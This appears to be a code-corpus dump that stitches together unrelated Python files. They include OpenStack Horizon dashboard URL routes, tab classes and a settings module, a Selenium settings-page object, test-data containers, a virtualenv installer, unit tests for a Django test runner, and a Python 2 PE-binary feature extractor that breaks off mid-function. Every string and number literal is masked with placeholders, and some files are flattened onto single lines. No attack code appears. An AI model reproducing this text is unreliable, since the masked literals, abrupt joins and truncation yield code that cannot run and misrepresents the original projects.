'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES % '<STR_LIT>' , views . ResizeView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( INSTANCES_KEYPAIR % '<STR_LIT>' , <EOL> views . DecryptPasswordView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , request ) : <EOL> port = self . tab_group . kwargs [ '<STR_LIT:port>' ] <EOL> return { '<STR_LIT:port>' : port } <EOL> class PortDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard import api <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> failure_url = '<STR_LIT>' <EOL> def get_context_data ( self , request ) : <EOL> port_id = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> port = api . neutron . port_get ( self . request , port_id ) <EOL> except Exception : <EOL> redirect = reverse ( self . failure_url ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> return { '<STR_LIT:port>' : port } <EOL> class PortDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import cinder <EOL> class OverviewTab ( tabs . Tab ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" ) <EOL> def get_context_data ( self , request ) : <EOL> try : <EOL> snapshot = self . tab_group . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( request , snapshot . volume_id ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return { "<STR_LIT>" : snapshot , <EOL> "<STR_LIT>" : volume } <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> class SnapshotDetailTabs ( tabs . TabGroup ) : <EOL> slug = "<STR_LIT>" <EOL> tabs = ( OverviewTab , ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . router . nexus1000v import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . CreateNetworkProfileView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . UpdateNetworkProfileView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
import logging
import os
import sys
import warnings

from django.utils.translation import ugettext_lazy as _

import xstatic.main
import xstatic.pkg.angular
import xstatic.pkg.angular_cookies
import xstatic.pkg.angular_mock
import xstatic.pkg.bootstrap_datepicker
import xstatic.pkg.bootstrap_scss
import xstatic.pkg.d3
import xstatic.pkg.font_awesome
import xstatic.pkg.hogan
import xstatic.pkg.jasmine
import xstatic.pkg.jquery
import xstatic.pkg.jquery_migrate
import xstatic.pkg.jquery_quicksearch
import xstatic.pkg.jquery_tablesorter
import xstatic.pkg.jquery_ui
import xstatic.pkg.jsencrypt
import xstatic.pkg.qunit
import xstatic.pkg.rickshaw
import xstatic.pkg.spin

from openstack_dashboard import exceptions

# Compact one-line warning format built from the category name and message.
warnings.formatwarning = lambda message, category, *args, **kwargs: '<STR_LIT>' % (category.__name__, message)

ROOT_PATH = os.path.dirname(os.path.abspath(__file__))
BIN_DIR = os.path.abspath(os.path.join(ROOT_PATH, '<STR_LIT:..>', '<STR_LIT>'))

# Make the dashboard package importable when run in place.
if ROOT_PATH not in sys.path:
    sys.path.append(ROOT_PATH)

DEBUG = False
TEMPLATE_DEBUG = DEBUG

SITE_BRANDING = '<STR_LIT>'

LOGIN_URL = '<STR_LIT>'
LOGOUT_URL = '<STR_LIT>'
LOGIN_REDIRECT_URL = '<STR_LIT:/>'

MEDIA_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '<STR_LIT:..>', '<STR_LIT>'))
MEDIA_URL = '<STR_LIT>'
STATIC_ROOT = os.path.abspath(os.path.join(ROOT_PATH, '<STR_LIT:..>', '<STR_LIT>'))
STATIC_URL = '<STR_LIT>'

ROOT_URLCONF = '<STR_LIT>'

# Horizon framework configuration; the dashboard/panel lists are filled
# in later by settings.update_dashboards().
HORIZON_CONFIG = {
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': <NUM_LIT:10>,
    '<STR_LIT>': {
        '<STR_LIT>': <NUM_LIT>,
        '<STR_LIT>': <NUM_LIT>,
        '<STR_LIT>': ['<STR_LIT>', '<STR_LIT>']
    },
    '<STR_LIT>': "<STR_LIT>",
    '<STR_LIT>': {'<STR_LIT>': exceptions.RECOVERABLE,
                  '<STR_LIT>': exceptions.NOT_FOUND,
                  '<STR_LIT>': exceptions.UNAUTHORIZED},
    '<STR_LIT>': [],
    '<STR_LIT>': [],
}

HORIZON_IMAGES_ALLOW_UPLOAD = True

# Disk-format choices offered by the image upload/create forms.
OPENSTACK_IMAGE_BACKEND = {
    '<STR_LIT>': [
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>')),
        ('<STR_LIT>', _('<STR_LIT>'))
    ]
}

MIDDLEWARE_CLASSES = (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
)

TEMPLATE_CONTEXT_PROCESSORS = (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
)

TEMPLATE_LOADERS = (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>'
)

TEMPLATE_DIRS = (
    os.path.join(ROOT_PATH, '<STR_LIT>'),
)

STATICFILES_FINDERS = (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
)

# Static assets served out of the XStatic packages imported above.
STATICFILES_DIRS = [
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.angular).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.angular_cookies).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.angular_mock).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.bootstrap_datepicker).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.bootstrap_scss).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.d3).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.hogan).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.font_awesome).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jasmine).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jquery).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jquery_migrate).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jquery_quicksearch).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jquery_tablesorter).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.jsencrypt).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.qunit).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.rickshaw).base_dir),
    ('<STR_LIT>',
     xstatic.main.XStatic(xstatic.pkg.spin).base_dir),
]

# jquery-ui changed its directory layout between releases; mount it at
# the path matching the installed version.
if xstatic.main.XStatic(xstatic.pkg.jquery_ui).version.startswith('<STR_LIT>'):
    STATICFILES_DIRS.append(
        ('<STR_LIT>',
         xstatic.main.XStatic(xstatic.pkg.jquery_ui).base_dir))
else:
    STATICFILES_DIRS.append(
        ('<STR_LIT>',
         xstatic.main.XStatic(xstatic.pkg.jquery_ui).base_dir))

# django-compressor configuration.
COMPRESS_PRECOMPILERS = (
    ('<STR_LIT>', '<STR_LIT>'),
)

COMPRESS_CSS_FILTERS = (
    '<STR_LIT>',
)

COMPRESS_ENABLED = True
COMPRESS_OUTPUT_DIR = '<STR_LIT>'
COMPRESS_CSS_HASHING_METHOD = '<STR_LIT>'
COMPRESS_PARSER = '<STR_LIT>'

INSTALLED_APPS = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]

TEST_RUNNER = '<STR_LIT>'

AUTHENTICATION_BACKENDS = ('<STR_LIT>',)

MESSAGE_STORAGE = '<STR_LIT>'

# Session/cookie behaviour.
SESSION_ENGINE = '<STR_LIT>'
SESSION_COOKIE_HTTPONLY = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SESSION_COOKIE_SECURE = False
SESSION_TIMEOUT = <NUM_LIT>

TOKEN_TIMEOUT_MARGIN = <NUM_LIT:10>

SESSION_COOKIE_MAX_SIZE = <NUM_LIT>

SESSION_SERIALIZER = '<STR_LIT>'

# Translations available in the UI.
LANGUAGES = (
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
    ('<STR_LIT>', '<STR_LIT>'),
)

LANGUAGE_CODE = '<STR_LIT>'
LANGUAGE_COOKIE_NAME = '<STR_LIT>'

USE_I18N = True
USE_L10N = True
USE_TZ = True

OPENSTACK_KEYSTONE_DEFAULT_ROLE = '<STR_LIT>'

DEFAULT_EXCEPTION_REPORTER_FILTER = '<STR_LIT>'

POLICY_FILES_PATH = os.path.join(ROOT_PATH, "<STR_LIT>")
# Per-service policy files consulted for access checks.
POLICY_FILES = {
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT:image>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
}

# Both may be overridden by local_settings below; SECRET_KEY gets a
# generated fallback further down when still unset.
SECRET_KEY = None
LOCAL_PATH = None

# Predefined security-group rule templates offered in the UI.
SECURITY_GROUP_RULES = {
    '<STR_LIT>': {
        '<STR_LIT:name>': _('<STR_LIT>'),
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT:1>',
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT:name>': _('<STR_LIT>'),
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT:1>',
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT:name>': _('<STR_LIT>'),
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
    },
}

# Deployment-specific overrides; a missing module is not fatal.
try:
    from local.local_settings import *
except ImportError:
    logging.warning("<STR_LIT>")

# Discover enabled dashboards/panels and fold them into the config.
import openstack_dashboard.enabled
import openstack_dashboard.local.enabled
from openstack_dashboard.utils import settings

INSTALLED_APPS = list(INSTALLED_APPS)
settings.update_dashboards([
    openstack_dashboard.enabled,
    openstack_dashboard.local.enabled,
], HORIZON_CONFIG, INSTALLED_APPS)

# Generate (or re-read) a SECRET_KEY when local_settings did not set one.
if not SECRET_KEY:
    if not LOCAL_PATH:
        LOCAL_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                  '<STR_LIT>')
    from horizon.utils import secret_key
    SECRET_KEY = secret_key.generate_or_read_from_file(os.path.join(LOCAL_PATH,
                                                       '<STR_LIT>'))

from openstack_dashboard import policy
POLICY_CHECK_FUNCTION = policy.check

COMPRESS_OFFLINE_CONTEXT = {
    '<STR_LIT>': STATIC_URL,
    '<STR_LIT>': HORIZON_CONFIG
}

if DEBUG:
    logging.basicConfig(level=logging.DEBUG)

from openstack_auth import utils as auth_utils
auth_utils.patch_middleware_get_user()
from selenium.webdriver.common import by

from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages.settings import changepasswordpage
from openstack_dashboard.test.integration_tests.regions import forms


class UsersettingsPage(basepage.BaseNavigationPage):
    """Page object wrapping the user-settings panel."""

    # Values the panel is restored to by return_to_default_settings().
    DEFAULT_LANGUAGE = "<STR_LIT>"
    DEFAULT_TIMEZONE = "<STR_LIT>"
    DEFAULT_PAGESIZE = "<STR_LIT>"
    DEFAULT_SETTINGS = {
        "<STR_LIT>": DEFAULT_LANGUAGE,
        "<STR_LIT>": DEFAULT_TIMEZONE,
        "<STR_LIT>": DEFAULT_PAGESIZE
    }

    SETTINGS_FORM_FIELDS = ("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")

    _settings_form_locator = (by.By.CSS_SELECTOR, '<STR_LIT>')
    _change_password_tab_locator = (by.By.CSS_SELECTOR,
                                    '<STR_LIT>')

    def __init__(self, driver, conf):
        super(UsersettingsPage, self).__init__(driver, conf)
        self._page_title = "<STR_LIT>"

    @property
    def settings_form(self):
        """Return a fresh FormRegion wrapping the settings form."""
        element = self._get_element(*self._settings_form_locator)
        return forms.FormRegion(self.driver, self.conf, element,
                                self.SETTINGS_FORM_FIELDS)

    @property
    def changepassword(self):
        """Page object for the change-password page."""
        return changepasswordpage.ChangePasswordPage(self.driver, self.conf)

    @property
    def change_password_tab(self):
        """The tab element that switches to the change-password form."""
        return self._get_element(*self._change_password_tab_locator)

    def change_language(self, lang=DEFAULT_LANGUAGE):
        """Select *lang* in the form and submit it."""
        self.settings_form.language.value = lang
        self.settings_form.submit.click()

    def change_timezone(self, timezone=DEFAULT_TIMEZONE):
        """Select *timezone* in the form and submit it."""
        self.settings_form.timezone.value = timezone
        self.settings_form.submit.click()

    def change_pagesize(self, size=DEFAULT_PAGESIZE):
        """Set the items-per-page value and submit the form."""
        self.settings_form.pagesize.value = size
        self.settings_form.submit.click()

    def return_to_default_settings(self):
        """Reset language, timezone and page size to their defaults."""
        self.change_language()
        self.change_timezone()
        self.change_pagesize()

    def go_to_change_password_page(self):
        """Open the change-password tab and return its page object."""
        self.change_password_tab.click()
        return changepasswordpage.ChangePasswordPage(self.driver, self.conf)
def load_test_data(load_onto=None):
    """Run every service's fixture loader.

    If *load_onto* is given, each loader is applied to that object and
    the same object is returned; otherwise a fresh ``TestData`` built
    from all loaders is returned.
    """
    # Imports are deferred so merely importing this module does not pull
    # in every per-service fixture module.
    from openstack_dashboard.test.test_data import ceilometer_data
    from openstack_dashboard.test.test_data import cinder_data
    from openstack_dashboard.test.test_data import exceptions
    from openstack_dashboard.test.test_data import glance_data
    from openstack_dashboard.test.test_data import heat_data
    from openstack_dashboard.test.test_data import keystone_data
    from openstack_dashboard.test.test_data import neutron_data
    from openstack_dashboard.test.test_data import nova_data
    from openstack_dashboard.test.test_data import sahara_data
    from openstack_dashboard.test.test_data import swift_data
    from openstack_dashboard.test.test_data import trove_data
    loaders = (
        exceptions.data,
        keystone_data.data,
        glance_data.data,
        nova_data.data,
        cinder_data.data,
        neutron_data.data,
        swift_data.data,
        heat_data.data,
        ceilometer_data.data,
        trove_data.data,
        sahara_data.data,
    )
    if load_onto:
        for data_func in loaders:
            data_func(load_onto)
        return load_onto
    else:
        return TestData(*loaders)


class TestData(object):
    """Holder object populated by the fixture loader callables."""

    def __init__(self, *args):
        # Each loader attaches its containers as attributes of self.
        for data_func in args:
            data_func(self)


class TestDataContainer(object):
    """An ordered, duplicate-free collection of test objects."""

    def __init__(self):
        self._objects = []

    def add(self, *args):
        """Append each argument, skipping objects already present."""
        for obj in args:
            if obj not in self._objects:
                self._objects.append(obj)

    def list(self):
        """Return the underlying list of stored objects."""
        return self._objects

    def filter(self, filtered=None, **kwargs):
        """Return the objects whose attributes match all of *kwargs*."""
        if filtered is None:
            filtered = self._objects
        try:
            key, value = kwargs.popitem()
        except KeyError:
            # No criteria left: recursion bottoms out here.
            return filtered

        def get_match(obj):
            return hasattr(obj, key) and getattr(obj, key) == value

        # list() is required on Python 3, where the filter() builtin
        # returns a lazy iterator (get()'s truth test and len() would
        # otherwise break); on Python 2 it is a harmless copy.
        return self.filter(filtered=list(filter(get_match, filtered)),
                           **kwargs)

    def get(self, **kwargs):
        """Return the single object matching *kwargs*.

        Raises Exception when zero or more than one object matches.
        """
        matches = self.filter(**kwargs)
        if not matches:
            raise Exception("<STR_LIT>")
        elif len(matches) > 1:
            raise Exception("<STR_LIT>")
        else:
            return matches.pop()

    def first(self):
        """Return the first object that was added."""
        return self._objects[0]

    def count(self):
        return len(self._objects)
<s> import os <EOL> import sys <EOL> import install_venv_common as install_venv <EOL> def print_help ( venv , root ) : <EOL> help = """<STR_LIT>""" <EOL> print ( help % ( venv , root ) ) <EOL> def main ( argv ) : <EOL> root = os . path . dirname ( os . path . dirname ( os . path . realpath ( __file__ ) ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> root = os . environ [ '<STR_LIT>' ] <EOL> venv = os . path . join ( root , '<STR_LIT>' ) <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> venv = os . environ [ '<STR_LIT>' ] <EOL> pip_requires = os . path . join ( root , '<STR_LIT>' ) <EOL> test_requires = os . path . join ( root , '<STR_LIT>' ) <EOL> py_version = "<STR_LIT>" % ( sys . version_info [ <NUM_LIT:0> ] , sys . version_info [ <NUM_LIT:1> ] ) <EOL> project = '<STR_LIT>' <EOL> install = install_venv . InstallVenv ( root , venv , pip_requires , test_requires , <EOL> py_version , project ) <EOL> options = install . parse_args ( argv ) <EOL> install . check_python_version ( ) <EOL> install . check_dependencies ( ) <EOL> install . create_virtualenv ( no_site_packages = options . no_site_packages ) <EOL> install . install_dependencies ( ) <EOL> print_help ( venv , root ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( sys . argv ) </s>
<s> from esri2open import toOpen , writeFile , closeUp , closeJSON <EOL> from prepare import prepareFile , prepareGeoJSON </s>
from __future__ import unicode_literals
from argparse import Namespace
# StringIO lives in io on Python 3; fall back to the py2 module.
try:
    from io import StringIO
except:
    from StringIO import StringIO
import sys
import unittest
# mock is bundled with unittest on Python 3; standalone package on py2.
try:
    from unittest.mock import MagicMock, patch
except:
    from mock import MagicMock, patch

from green import djangorunner
from green.config import mergeConfig


class TestDjangoMissing(unittest.TestCase):
    """Behaviour when django itself is not importable."""

    def test_importError(self):
        # django_missing() is expected to raise ImportError when called.
        self.assertRaises(ImportError, djangorunner.django_missing)


class TestDjangoRunner(unittest.TestCase):
    """Tests for DjangoRunner.run_tests with its environment mocked out."""

    def setUp(self):
        # Skip the whole class when django is not installed.
        try:
            djangorunner.DjangoRunner()
        except ImportError:
            raise unittest.SkipTest("<STR_LIT>")
        # Capture stdout so tests can inspect the runner's output; the
        # original stream is restored via addCleanup even on failure.
        saved_stdout = sys.stdout
        self.stream = StringIO()
        sys.stdout = self.stream
        self.addCleanup(setattr, sys, '<STR_LIT>', saved_stdout)

    def test_run_testsWithLabel(self):
        """Running with an explicit test label reports success."""
        dr = djangorunner.DjangoRunner()
        # Stub out the django test environment/database hooks.
        dr.setup_test_environment = MagicMock()
        dr.setup_databases = MagicMock()
        dr.teardown_databases = MagicMock()
        dr.teardown_test_environment = MagicMock()
        dr.run_tests(('<STR_LIT>',), testing=True)
        self.assertIn('<STR_LIT:OK>', self.stream.getvalue())

    def test_run_testsWithoutLabel(self):
        """With no labels the runner discovers from the current directory."""
        dr = djangorunner.DjangoRunner()
        dr.setup_test_environment = MagicMock()
        dr.setup_databases = MagicMock()
        dr.teardown_databases = MagicMock()
        dr.teardown_test_environment = MagicMock()
        # Swap loadTargets for a mock; restored afterwards via addCleanup.
        saved_loadTargets = djangorunner.loadTargets
        djangorunner.loadTargets = MagicMock()
        self.addCleanup(setattr, djangorunner, '<STR_LIT>', saved_loadTargets)
        dr.run_tests((), testing=True)
        djangorunner.loadTargets.assert_called_with(['<STR_LIT:.>'])
        self.assertIn('<STR_LIT>', self.stream.getvalue())

    def test_run_testsWithBadInput(self):
        """Passing None instead of a label tuple raises ValueError."""
        dr = djangorunner.DjangoRunner()
        dr.setup_test_environment = MagicMock()
        dr.setup_databases = MagicMock()
        self.assertRaises(ValueError, dr.run_tests, None, True)

    # NOTE: @patch decorators apply bottom-up, so the injected mock
    # arguments arrive in reverse decorator order.
    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_run_noTests(self, mock_loadTargets, mock_run, mock_GreenTestSuite):
        """When discovery finds nothing, an empty suite is still run."""
        dr = djangorunner.DjangoRunner()
        dr.setup_test_environment = MagicMock()
        dr.setup_databases = MagicMock()
        dr.teardown_databases = MagicMock()
        dr.teardown_test_environment = MagicMock()
        mock_loadTargets.return_value = None
        mock_GreenTestSuite.return_value = <NUM_LIT>
        dr.run_tests((), testing=True)
        # The sentinel suite is forwarded to run() as its first argument.
        self.assertEqual(mock_run.call_args[<NUM_LIT:0>][<NUM_LIT:0>], <NUM_LIT>)

    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    @patch('<STR_LIT>')
    def test_run_coverage(self, mock_loadTargets, mock_run, mock_GreenTestSuite, mock_mergeConfig):
        """A coverage-enabled config still runs the (empty) suite."""
        args = mergeConfig(Namespace())
        args.run_coverage = True
        args.cov = MagicMock()
        mock_mergeConfig.return_value = args
        dr = djangorunner.DjangoRunner()
        dr.setup_test_environment = MagicMock()
        dr.setup_databases = MagicMock()
        dr.teardown_databases = MagicMock()
        dr.teardown_test_environment = MagicMock()
        mock_loadTargets.return_value = None
        mock_GreenTestSuite.return_value = <NUM_LIT>
        dr.run_tests((), testing=True)
        self.assertEqual(mock_run.call_args[<NUM_LIT:0>][<NUM_LIT:0>], <NUM_LIT>)
'''<STR_LIT>'''
# NOTE(review): Python 2 source (`except E, err`, print statements,
# `unicode`); indentation below is reconstructed from the token stream.
import sys
import pefile


class PEFileFeatures():
    '''Extract dense (numeric) and sparse (list-valued) features from a
    PE binary using the pefile library.'''

    def __init__(self):
        '''Register the default dense and sparse feature names.'''
        self._dense_feature_list = None    # names of scalar features
        self._dense_features = None        # name -> value after execute()
        self._sparse_feature_list = None   # names of list-valued features
        self._sparse_features = None
        self._verbose = False
        self._warnings = []
        self.set_dense_features(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                                 '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
        self.set_sparse_features(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])

    def execute(self, input_data):
        '''Parse *input_data* (raw PE bytes) and return the dense
        feature dict, or an error dict when parsing fails.'''
        raw_bytes = input_data
        pefile_handle, error_str = self.open_using_pefile('<STR_LIT>', raw_bytes)
        if not pefile_handle:
            return {'<STR_LIT:error>': error_str}
        return self.extract_features_using_pefile(pefile_handle)

    def set_dense_features(self, dense_feature_list):
        '''Replace the list of dense feature names to extract.'''
        self._dense_feature_list = dense_feature_list

    def get_dense_features(self):
        '''Return the dense features from the last extraction.'''
        return self._dense_features

    def set_sparse_features(self, sparse_feature_list):
        '''Replace the list of sparse feature names to extract.'''
        self._sparse_feature_list = sparse_feature_list

    def get_sparse_features(self):
        '''Return the sparse features from the last extraction.'''
        return self._sparse_features

    def open_using_pefile(self, input_name, input_bytes):
        '''Open *input_bytes* with pefile; return (pe, None) on success
        or (None, error_string) when the data is not a usable PE.'''
        try:
            pe = pefile.PE(data=input_bytes, fast_load=False)
        except Exception, error:
            print '<STR_LIT>' % input_name
            error_str = '<STR_LIT>' % (str(error))
            return None, error_str
        # Reject files pefile parsed but that lack the headers/data
        # directories the extractor relies on below.
        if (pe.PE_TYPE is None or pe.OPTIONAL_HEADER is None or len(pe.OPTIONAL_HEADER.DATA_DIRECTORY) < <NUM_LIT:7>):
            print '<STR_LIT>' % input_name
            error_str = '<STR_LIT>' % input_name
            return None, error_str
        return pe, None

    def extract_features_using_pefile(self, pe):
        '''Walk the parsed PE and fill the dense/sparse feature dicts;
        features that cannot be read fall back to a default value.'''
        extracted_dense = {}
        extracted_sparse = {}
        # Sentinel marking "not yet extracted"; replaced by the default
        # at the end so absent features are still present in the output.
        feature_not_found_flag = -<NUM_LIT>
        feature_default_value = <NUM_LIT:0>
        self._warnings = []
        for feature in self._dense_feature_list:
            extracted_dense[feature] = feature_not_found_flag
        for feature in self._sparse_feature_list:
            extracted_sparse[feature] = feature_not_found_flag

        # Flag whether every section uses a well-known name (plus the
        # numbered '/N' names emitted for long-name sections).
        std_sections = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                        '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                        '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        for i in range(<NUM_LIT:200>):
            std_sections.append('<STR_LIT:/>' + str(i))
        std_section_names = <NUM_LIT:1>
        extracted_sparse['<STR_LIT>'] = []
        for section in pe.sections:
            name = convertToAsciiNullTerm(section.Name).lower()
            extracted_sparse['<STR_LIT>'].append(name)
            if (name not in std_sections):
                std_section_names = <NUM_LIT:0>
        extracted_dense['<STR_LIT>'] = std_section_names

        # Header-derived scalar features.
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.DATA_DIRECTORY[<NUM_LIT:6>].Size
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.MajorImageVersion
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.MinorImageVersion
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.DATA_DIRECTORY[<NUM_LIT:1>].VirtualAddress
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.DATA_DIRECTORY[<NUM_LIT:0>].Size
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.CheckSum
        try:
            extracted_dense['<STR_LIT>'] = pe.generate_checksum()
        except ValueError:
            extracted_dense['<STR_LIT>'] = <NUM_LIT:0>
        if (len(pe.sections) > <NUM_LIT:0>):
            extracted_dense['<STR_LIT>'] = pe.sections[<NUM_LIT:0>].VirtualAddress
            extracted_dense['<STR_LIT>'] = pe.sections[<NUM_LIT:0>].Misc_VirtualSize
        extracted_dense['<STR_LIT>'] = pe.FILE_HEADER.NumberOfSections
        extracted_dense['<STR_LIT>'] = pe.FILE_HEADER.TimeDateStamp
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
        extracted_dense['<STR_LIT>'] = len(pe.__data__)

        # Import table: module count plus total imported-symbol count.
        if hasattr(pe, '<STR_LIT>'):
